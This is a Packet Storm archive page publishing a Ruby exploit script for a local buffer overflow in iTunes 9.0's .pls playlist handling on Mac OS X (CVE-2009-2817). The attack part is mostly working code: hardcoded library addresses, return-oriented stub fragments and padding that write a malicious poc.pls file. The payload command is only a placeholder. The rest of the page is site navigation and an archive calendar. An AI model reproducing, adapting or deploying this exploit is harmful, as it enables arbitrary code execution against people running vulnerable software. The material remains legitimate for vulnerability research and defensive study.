what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iTunes 9.0 Buffer Overflow

iTunes 9.0 Buffer Overflow
Posted Feb 17, 2010
Authored by S2 Crew

iTunes file handling local buffer overflow exploit that creates a malicious .pls file. Affects version 9.0 on Mac OS X.

tags | exploit, overflow, local
systems | apple, osx
advisories | CVE-2009-2817
SHA-256 | 0d3d25fbf64ab5c281bc87376978e384c6e0c60f12194baa9a83445c36bdde3f

iTunes 9.0 Buffer Overflow

Change Mirror Download


# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2
 (/GS flag, DOS)
# CVE: CVE-2009-2817

# Code:

#!/usr/bin/env ruby

SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459

def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
JMP_EAX].pack("V5") +
"X" * 4
end

payload_cmd = "hereisthetrick"
stub = make_exec_payload_from_heap_stub()
ext = "A" * 59
stub = make_exec_payload_from_heap_stub()
exploit = ext + stub + payload_cmd

# pls file format

file = "[playlist]\n"
file += "NumberOfEntries=1\n"
file += "File1=http://1/asdf." + exploit + "\n"
file += "Title1=asdf\n"
file += "Length1=100\n"
file += "Version=2" + '\n'

File.open('poc.pls','w') do |f|
f.puts file
f.close
end



Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close